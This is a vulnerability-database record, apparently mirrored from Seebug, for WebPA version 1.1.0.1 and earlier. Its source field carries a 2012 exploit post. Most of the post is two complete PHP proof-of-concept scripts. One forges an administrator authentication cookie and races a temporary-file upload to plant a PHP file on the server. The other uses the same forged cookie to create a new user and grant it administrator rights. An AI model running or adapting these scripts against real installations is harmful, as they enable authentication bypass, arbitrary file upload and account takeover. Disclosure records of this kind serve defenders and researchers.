Description
No description provided by source.
{"lastseen": "2017-11-19T15:23:15", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "href": "https://www.seebug.org/vuldb/ssvid-74620", "references": [], "enchantments_done": [], "id": "SSV:74620", "title": "webpa <= 1.1.0.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n :::::::-. ... ::::::. :::.\r\n ;;, `';, ;; ;;;`;;;;, `;;;\r\n `[[ [[[[' [[[ [[[[[. '[[\r\n $$, $$$$ $$$ $$$ "Y$c$$\r\n 888_,o8P'88 .d888 888 Y88\r\n MMMMP"` "YmmMMMM"" MMM YM\r\n\r\n [ Discovered by dun \\ posdub[at]gmail.com ]\r\n [ 2012-08-23 ]\r\n ##################################################\r\n # [ WebPA <= 1.1.0.1 ] Multiple Vulnerabilities #\r\n ##################################################\r\n #\r\n # Script: "WebPA is an open source online peer assessment tool that enables\r\n # every team member to recognise individual contributions to group work."\r\n #\r\n # Vendor: http://www.webpaproject.com/\r\n # Download: http://sourceforge.net/projects/webpa/files/webpa/\r\n # Exploits were tested on:\r\n # Windows (Apache 2.2.17 + php 5.2.17)\r\n # Linux Centos (Apache 2.2.3 (CentOS) + php 5.2.17)\r\n #\r\n ##################################################\r\n # [ Arbitrary File Upload ]\r\n # PoC exploit Code:\r\n <?php\r\n error_reporting(0);\r\n set_time_limit(0);\r\n ini_set("default_socket_timeout", 5);\r\n\r\n function http_send($host, $port, $headers) {\r\n $fp = fsockopen($host, $port);\r\n if (!$fp) die('Connection -> fail');\r\n fputs($fp, $headers);\r\n return $fp;\r\n }\r\n\r\n function http_recv($fp) {\r\n $ret="";\r\n while (!feof($fp))\r\n $ret.= fgets($fp, 1024);\r\n fclose($fp);\r\n return $ret;\r\n }\r\n\r\n print "\\n# WebPA v1.1.0.1 Arbitrary File Upload #\\n";\r\n print "# Discovered by dun \\ posdub[at]gmail.com #\\n\\n";\r\n if ($argc < 3) {\r\n print "Usage: php $argv[0] <host> <path>\\n";\r\n print "Example: php $argv[0] localhost /WebPA/\\n";\r\n die();\r\n }\r\n\r\n $host = $argv[1];\r\n $path = $argv[2];\r\n $tmp = 'tmp/';\r\n $temp_prefix='temp_';\r\n $up_file='phpinfo.php';\r\n $i=0;\r\n // preparing cookie for authentication bypass\r\n $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array('user_id'=> '1', 'admin'=> '1')));\r\n // preparing POST data to perform the maximum delay before deleting temporary php file\r\n $payload = "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"uploadedfile\\"; filename=\\"%s\\"\\r\\n";\r\n $payload .= "Content-Type: text/plain\\r\\n\\r\\n";\r\n $payload .= "<?php fwrite(fopen('%s','w'),'<?php phpinfo(); ?>'); ?>!".str_repeat("A",40)."\\r\\n";\r\n // making max lag, before unlink\r\n $payload .= str_repeat(str_repeat("A!",1)."!".str_repeat("A!",4)."\\r\\n",1000)."\\r\\n"; \r\n $payload .= "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"rdoFileContentType\\"\\r\\n\\r\\n";\r\n $payload .= "2\\r\\n";\r\n $payload .= "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"rdoFileSeperator\\"\\r\\n\\r\\n";\r\n $payload .= "!\\r\\n";\r\n $payload .= "-----------------------------187161971819895--\\r\\n";\r\n $headers = "POST {$path}{$tmp}readfile.php HTTP/1.1\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n";\r\n $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\\r\\n";\r\n $headers .= "Content-Length: ".strlen($payload)."\\r\\n\\r\\n";\r\n $headers .= sprintf($payload, $temp_prefix.$up_file, $up_file);\r\n fclose(http_send($host, 80, $headers));\r\n $headers = "GET {$path}{$tmp}%s HTTP/1.0\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n\\r\\n";\r\n\r\n while(++$i<1000) {\r\n $res=http_recv(http_send($host, 80, sprintf($headers, $temp_prefix.$up_file)));\r\n if(!preg_match('/404 Not Found/',$res)) {\r\n $res=http_recv(http_send($host, 80, sprintf($headers, $up_file)));\r\n if(preg_match('/200 OK/',$res))\r\n print "Success!\\n\\nUploaded file: http://{$host}{$path}{$tmp}{$up_file}\\n";\r\n break;\r\n }\r\n }\r\n if($i==1000) print "Failed.\\n";\r\n ?>\r\n #\r\n ##################################################\r\n # [ Arbitrary Add Admin ]\r\n # PoC exploit Code:\r\n <?php\r\n error_reporting(0);\r\n set_time_limit(0);\r\n ini_set("default_socket_timeout", 5);\r\n\r\n function http_send($host, $port, $headers) {\r\n $fp = fsockopen($host, $port);\r\n if (!$fp) die('Connection -> fail');\r\n fputs($fp, $headers);\r\n return $fp;\r\n }\r\n\r\n function http_recv($fp) {\r\n $ret="";\r\n while (!feof($fp))\r\n $ret.= fgets($fp, 1024);\r\n fclose($fp);\r\n return $ret;\r\n }\r\n\r\n print "\\n# WebPA v1.1.0.1 Arbitrary Add Admin Exploit #\\n";\r\n print "# Discovered by dun \\ posdub[at]gmail.com #\\n\\n";\r\n if ($argc < 5) {\r\n print "Usage: php $argv[0] <host> <path> username password\\n";\r\n print "Example: php $argv[0] localhost /WebPA/ foo bar\\n";\r\n die();\r\n }\r\n\r\n $host = $argv[1];\r\n $path = $argv[2];\r\n $newuser = $argv[3];\r\n $newpass = $argv[4];\r\n $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array( 'user_id'=> '1', 'admin'=> '1' )));\r\n print "Adding a new user [ {$newuser} : {$newpass} ]\\n";\r\n $payload = "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"uploadedfile\\"; filename=\\"user.csv\\"\\r\\n";\r\n $payload .= "Content-Type: text/csv\\r\\n\\r\\n";\r\n $payload .= "institutional_reference,forename,lastname,email,username,module_code,department_id,course_id,password\\r\\n";\r\n $payload .= "1,2,3,4,{$newuser},6,7,8,{$newpass}\\r\\n\\r\\n";\r\n $payload .= "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"rdoFileContentType\\"\\r\\n\\r\\n";\r\n $payload .= "2\\r\\n";\r\n $payload .= "-----------------------------187161971819895--\\r\\n";\r\n $headers = "POST {$path}admin/load/simple.php HTTP/1.1\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n";\r\n $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\\r\\n";\r\n $headers .= "Content-Length: ".strlen($payload)."\\r\\n\\r\\n";\r\n $headers .= ($payload);\r\n fclose(http_send($host, 80, $headers));\r\n sleep(2);\r\n print "Granting admin privileges for user [ {$newuser} ]\\n";\r\n $headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n\\r\\n";\r\n preg_match_all('/php\\?u=(\\d+)/',http_recv(http_send($host, 80, $headers)) , $matches);\r\n if(!is_numeric(max($matches[1]))) die('Failed.');\r\n sleep(2);\r\n $payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=".urlencode('Save Changes');\r\n $headers = "POST {$path}admin/edit/index.php?u=".max($matches[1])." HTTP/1.0\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n";\r\n $headers .= "Content-Type: application/x-www-form-urlencoded\\r\\n";\r\n $headers .= "Content-Length: ".strlen($payload)."\\r\\n\\r\\n";\r\n $headers .= ($payload);\r\n fclose(http_send($host, 80, $headers));\r\n print "Success!\\n\\n";\r\n print "http://{$host}{$path}login.php\\n";\r\n print "user: {$newuser}\\n";\r\n print "pass: {$newpass}\\n";\r\n ?>\r\n #\r\n ### [ dun / 2012 ] ###############################\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74620", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645468205, "score": 1659785532, "epss": 1678850553}}
{}
webpa <= 1.1.0.1 - Multiple Vulnerabilities